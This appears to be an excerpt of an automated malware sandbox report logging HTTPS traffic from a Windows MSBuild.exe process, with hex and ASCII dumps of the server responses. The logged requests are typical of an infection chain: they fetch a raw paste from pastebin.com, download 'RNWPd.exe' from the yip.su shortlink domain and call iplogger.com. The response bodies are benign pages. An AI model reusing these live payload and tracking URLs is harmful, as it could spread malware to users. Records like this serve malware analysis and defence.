                    2024-09-16 19:22:53 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:22:53 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:22:53 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:22:53 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:22:53 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:22:53 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:53 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    46192.168.2.649776104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:58 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:58 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:58 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433a754b435e82-EWR
                    2024-09-16 19:22:58 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:58 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:58 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:58 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:58 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    47192.168.2.649777188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:00 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:00 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:00 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:00 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:00 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5B3KCcEZMgXYMqNgzhtjn91LDOT078dsW7Ry532BRQlmtaBSggqYOGewjqtqZNVKmDo%2FzOYDYxhz9ZD4X2eQEY6Gkt%2Bf5bY9t%2FTjiAb5kHZwTpcyJGZkgI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433a7e48e41927-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:00 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:00 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                    Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                    2024-09-16 19:23:00 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:23:00 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:23:00 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:23:00 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:23:00 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:00 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    48192.168.2.649778104.21.76.574431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:05 UTC68OUTGET /1djqU4 HTTP/1.1
                    Host: iplogger.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:05 UTC1285INHTTP/1.1 403 Forbidden
                    Date: Mon, 16 Sep 2024 19:23:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                    Cross-Origin-Embedder-Policy: require-corp
                    Cross-Origin-Opener-Policy: same-origin
                    Cross-Origin-Resource-Policy: same-origin
                    Origin-Agent-Cluster: ?1
                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                    Referrer-Policy: same-origin
                    X-Content-Options: nosniff
                    X-Frame-Options: SAMEORIGIN
                    cf-mitigated: challenge
                    2024-09-16 19:23:05 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 76 61 70 74 7a 57 4c 69 76 54 37 30 4a 4f 57 44 66 4e 68 64 4f 6b 33 4f 49 77 76 65 74 69 35 4c 70 4d 47 46 77 51 4d 4a 7a 6d 2b 6f 44 46 4a 76 36 4b 69 6d 4d 5a 69 7a 64 6b 6e 55 68 6c 38 6c 48 44 41 79 68 4d 41 5a 67 57 49 31 41 5a 32 6e 68 4c 68 6f 76 43 4e 59 63 76 6a 49 43 50 61 6f 57 6b 52 61 61 6b 49 56 32 32 73 3d 24 33 2f 76 6f 39 5a 65 42 5a 4d 72 35 63 49 34 5a 6a 54 6a 72 37 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 